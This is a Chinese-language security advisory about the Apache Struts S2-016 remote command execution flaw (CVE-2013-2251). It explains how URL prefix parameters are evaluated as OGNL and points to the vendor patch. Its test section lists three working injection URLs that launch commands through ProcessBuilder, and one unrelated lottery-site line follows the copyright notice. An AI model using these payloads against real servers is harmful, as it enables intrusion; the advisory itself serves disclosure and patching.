首頁 -> 安全研究

安全研究

安全漏洞
Apache Struts多個前綴參數遠程命令執行漏洞(CVE-2013-2251)

發布日期:2013-07-16
更新日期:2013-07-17

受影響系統:
Apache Group Struts < 2.3.15.1
描述:
BUGTRAQ  ID: 61189
CVE(CAN) ID: CVE-2013-2251

Struts2 是第二代基于Model-View-Controller (MVC)模型的java企業級web應用框架。它是WebWork和Struts社區合并后的產物。

Apache Struts2的action:、redirect:和redirectAction:前綴參數在實現其功能的過程中使用了Ognl表達式,并將用戶通過URL提交的內容拼接入Ognl表達式中,從而造成攻擊者可以通過構造惡意URL來執行任意Java代碼,進而可執行任意命令。

redirect:和redirectAction:此兩項前綴為Struts默認開啟功能,目前Struts 2.3.15.1以下版本均存在此漏洞。

<*來源:Takeshi Terada (Mitsui Bussan Secure Directions, Inc)
  
  鏈接:http://struts.apache.org/release/2.3.x/docs/s2-016.html
*>

測試方法:

警 告

以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!

http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

建議:
廠商補丁:

Apache Group
------------
廠商已經發布Apache Struts 2.3.15.1以修復此安全漏洞,建議Struts用戶及時升級到最新版本。

廠商安全公告:S2-016
鏈接:http://struts.apache.org/release/2.3.x/docs/s2-016.html

軟件升級頁面:http://struts.apache.org/download.cgi#struts23151

瀏覽次數:14208
嚴重程度:0(網友投票)
本安全漏洞由綠盟科技翻譯整理,版權所有,未經許可,不得轉載
綠盟科技給您安全的保障
海南七星彩彩票官网